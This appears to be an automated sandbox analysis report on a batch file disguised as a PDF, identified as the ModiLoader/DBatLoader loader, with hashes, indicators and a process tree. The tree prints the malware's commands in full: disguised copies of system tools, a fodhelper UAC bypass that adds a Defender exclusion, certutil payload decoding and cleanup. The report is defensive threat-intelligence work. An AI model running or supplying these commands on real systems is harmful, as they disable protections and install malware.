Analysis
-
max time kernel
127s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
26/03/2024, 06:45
Static task
static1
Behavioral task
behavioral1
Sample
CDE_7558497830/CDE_7558497830/CDE_7558497830/CDE_7558497830.pdf
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
CDE_7558497830/CDE_7558497830/CDE_7558497830/CDE_7558497830.pdf
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
CDE_7558497830/CDE_7558497830/CDE_7558497830/CDE_7558497830_PDF.bat
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
CDE_7558497830/CDE_7558497830/CDE_7558497830/CDE_7558497830_PDF.bat
Resource
win10v2004-20240226-en
General
-
Target
CDE_7558497830/CDE_7558497830/CDE_7558497830/CDE_7558497830_PDF.bat
-
Size
3.6MB
-
MD5
75f1ce6a46272e4ece22ad481b8a1ed3
-
SHA1
f7a7f98e6995bae293d8cd06d5806d1803ea3ed9
-
SHA256
41149322a4ee305483bce2d4b7e1a561c5973761dd7c82c9fb21059243dc0b0b
-
SHA512
2f9c1a74b94fbb49a79d6d10e97edd2e71c19485e0d6b3509b17bf7cf7f64e82dc2de26303404e1cfbfe8a107bcd8bd1e99619455307e748a8fba5b4f61a1e24
-
SSDEEP
49152:0Ppmq12RxHW9ub71aMzQweyrLLX+5Z4yPLyiTvCuP8s7JaqD:A
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 1 IoCs
resource yara_rule behavioral3/memory/2432-55-0x0000000002F40000-0x0000000003F40000-memory.dmp modiloader_stage2 -
Executes dropped EXE 16 IoCs
pid Process 2896 alpha.exe 2688 alpha.exe 2912 alpha.exe 2500 xkn.exe 2396 alpha.exe 2184 alpha.exe 2532 kn.exe 1252 alpha.exe 2356 kn.exe 2432 Lewxa.com 2824 alpha.exe 2408 alpha.exe 2964 alpha.exe 2796 alpha.exe 1696 alpha.exe 2536 alpha.exe -
Loads dropped DLL 9 IoCs
pid Process 2768 cmd.exe 2768 cmd.exe 2768 cmd.exe 2912 alpha.exe 2500 xkn.exe 2500 xkn.exe 2184 alpha.exe 1248 WerFault.exe 1248 WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 1248 2432 WerFault.exe 43 -
Kills process with taskkill 2 IoCs
pid Process 1032 taskkill.exe 2684 taskkill.exe -
Modifies registry class 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users " reg.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000_CLASSES\ms-settings\shell\open reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2388 reg.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2432 Lewxa.com -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2500 xkn.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2500 xkn.exe Token: SeDebugPrivilege 1032 taskkill.exe Token: SeDebugPrivilege 2684 taskkill.exe -
Suspicious use of FindShellTrayWindow 14 IoCs
pid Process 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com -
Suspicious use of SendNotifyMessage 14 IoCs
pid Process 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com 2432 Lewxa.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2768 wrote to memory of 2636 2768 cmd.exe 29 PID 2768 wrote to memory of 2636 2768 cmd.exe 29 PID 2768 wrote to memory of 2636 2768 cmd.exe 29 PID 2636 wrote to memory of 2240 2636 cmd.exe 30 PID 2636 wrote to memory of 2240 2636 cmd.exe 30 PID 2636 wrote to memory of 2240 2636 cmd.exe 30 PID 2768 wrote to memory of 2896 2768 cmd.exe 31 PID 2768 wrote to memory of 2896 2768 cmd.exe 31 PID 2768 wrote to memory of 2896 2768 cmd.exe 31 PID 2896 wrote to memory of 3048 2896 alpha.exe 32 PID 2896 wrote to memory of 3048 2896 alpha.exe 32 PID 2896 wrote to memory of 3048 2896 alpha.exe 32 PID 2768 wrote to memory of 2688 2768 cmd.exe 33 PID 2768 wrote to memory of 2688 2768 cmd.exe 33 PID 2768 wrote to memory of 2688 2768 cmd.exe 33 PID 2688 wrote to memory of 2452 2688 alpha.exe 34 PID 2688 wrote to memory of 2452 2688 alpha.exe 34 PID 2688 wrote to memory of 2452 2688 alpha.exe 34 PID 2768 wrote to memory of 2912 2768 cmd.exe 35 PID 2768 wrote to memory of 2912 2768 cmd.exe 35 PID 2768 wrote to memory of 2912 2768 cmd.exe 35 PID 2912 wrote to memory of 2500 2912 alpha.exe 36 PID 2912 wrote to memory of 2500 2912 alpha.exe 36 PID 2912 wrote to memory of 2500 2912 alpha.exe 36 PID 2500 wrote to memory of 2396 2500 xkn.exe 37 PID 2500 wrote to memory of 2396 2500 xkn.exe 37 PID 2500 wrote to memory of 2396 2500 xkn.exe 37 PID 2396 wrote to memory of 2388 2396 alpha.exe 38 PID 2396 wrote to memory of 2388 2396 alpha.exe 38 PID 2396 wrote to memory of 2388 2396 alpha.exe 38 PID 2768 wrote to memory of 2184 2768 cmd.exe 39 PID 2768 wrote to memory of 2184 2768 cmd.exe 39 PID 2768 wrote to memory of 2184 2768 cmd.exe 39 PID 2184 wrote to memory of 2532 2184 alpha.exe 40 PID 2184 wrote to memory of 2532 2184 alpha.exe 40 PID 2184 wrote to memory of 2532 2184 alpha.exe 40 PID 2768 wrote to memory of 1252 2768 cmd.exe 41 PID 2768 wrote to memory of 1252 2768 cmd.exe 41 PID 2768 wrote to memory of 1252 2768 cmd.exe 41 PID 1252 wrote to memory of 2356 1252 alpha.exe 42 PID 1252 wrote to memory of 2356 1252 alpha.exe 42 PID 1252 wrote to memory of 2356 1252 alpha.exe 42 PID 2768 wrote to memory of 2432 2768 cmd.exe 43 PID 2768 wrote to memory of 2432 2768 cmd.exe 43 PID 2768 wrote to memory of 2432 2768 cmd.exe 43 PID 2768 wrote to memory of 2432 2768 cmd.exe 43 PID 2768 wrote to memory of 2824 2768 cmd.exe 44 PID 2768 wrote to memory of 2824 2768 cmd.exe 44 PID 2768 wrote to memory of 2824 2768 cmd.exe 44 PID 2768 wrote to memory of 2408 2768 cmd.exe 45 PID 2768 wrote to memory of 2408 2768 cmd.exe 45 PID 2768 wrote to memory of 2408 2768 cmd.exe 45 PID 2768 wrote to memory of 2964 2768 cmd.exe 46 PID 2768 wrote to memory of 2964 2768 cmd.exe 46 PID 2768 wrote to memory of 2964 2768 cmd.exe 46 PID 2768 wrote to memory of 2796 2768 cmd.exe 47 PID 2768 wrote to memory of 2796 2768 cmd.exe 47 PID 2768 wrote to memory of 2796 2768 cmd.exe 47 PID 2768 wrote to memory of 1696 2768 cmd.exe 48 PID 2768 wrote to memory of 1696 2768 cmd.exe 48 PID 2768 wrote to memory of 1696 2768 cmd.exe 48 PID 1696 wrote to memory of 1032 1696 alpha.exe 49 PID 1696 wrote to memory of 1032 1696 alpha.exe 49 PID 1696 wrote to memory of 1032 1696 alpha.exe 49
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\CDE_7558497830\CDE_7558497830\CDE_7558497830\CDE_7558497830_PDF.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\system32\cmd.execmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe3⤵PID:2240
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe3⤵PID:3048
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\extrac32.exeextrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:2452
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2912 -
C:\Users\Public\xkn.exeC:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Users\Public\alpha.exe"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\system32\reg.exereg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "5⤵
- Modifies registry class
- Modifies registry key
PID:2388
-
-
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\CDE_7558497830\CDE_7558497830\CDE_7558497830\CDE_7558497830_PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 92⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\CDE_7558497830\CDE_7558497830\CDE_7558497830\CDE_7558497830_PDF.bat" "C:\\Users\\Public\\Lewxa.txt" 93⤵
- Executes dropped EXE
PID:2532
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1252 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 123⤵
- Executes dropped EXE
PID:2356
-
-
-
C:\Users\Public\Libraries\Lewxa.comC:\\Users\\Public\\Libraries\\Lewxa.com2⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2432 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2432 -s 7803⤵
- Loads dropped DLL
- Program crash
PID:1248
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2824
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2408
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2964
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2796
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettings.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe2⤵
- Executes dropped EXE
PID:2536 -
C:\Windows\system32\taskkill.exetaskkill /F /IM SystemSettingsAdminFlows.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
-
C:\Windows\system32\cmd.execmd /c del "C:\Users\Public\alpha.exe" / A / F / Q / S2⤵PID:2984
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.6MB
MD56d75d7c7cc50099ca677b647ca9ce8d3
SHA1b0bb8832ccbc990c8f6c69ec61c2e73bc9bc8cad
SHA2566ef611c9602ce5918ab87951f9ffd851b1fb53decbd199d073a9823d6b330bf4
SHA512b2d93df8a1ae31b052045a50bf5ca10b80e9e3d34359bac69d5626ccc399e375b66b07cca1fd202435fb526ae7f9bde1f56bb8767b5a9051d59de9829d45e2b2
-
Filesize
1.3MB
MD52dfc4938d980a733ca8484df24df9886
SHA14660364cb6a885580eb67731ae6b2bd32842d07d
SHA25626d0349541b20a4c51524c7f422946667fa1261e42c0eec960dbb368030ced25
SHA512de7f56d137a97dd172fffe54325d8718cfc1bdebf0c210e2308da7ba437b79a59096e3b0db03abb4f0b6005114df436a8ffb997ffe3cba08c89b818636f7b4ea
-
Filesize
337KB
MD55746bd7e255dd6a8afa06f7c42c1ba41
SHA10f3c4ff28f354aede202d54e9d1c5529a3bf87d8
SHA256db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386
SHA5123a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e
-
Filesize
64KB
MD5ef70856e875a628e03df9867f6a9abd6
SHA197f8064fe2197d6002068d8380410fdfc81730e5
SHA256f168a9bab7a544fab673f52abdf4e14dce7b624fab336545e6ea66919680fe61
SHA512bb1b204f213d5ebe8b85082e17c5f8fdf20837bba08e486db08e3abceef16de2b4c4be053b1a300ece7f793bea360c5d6bdfb2684780fa2de87af9682ed7b396
-
Filesize
1.1MB
MD5ec1fd3050dbc40ec7e87ab99c7ca0b03
SHA1ae7fdfc29f4ef31e38ebf381e61b503038b5cb35
SHA2561e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3
SHA5124e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d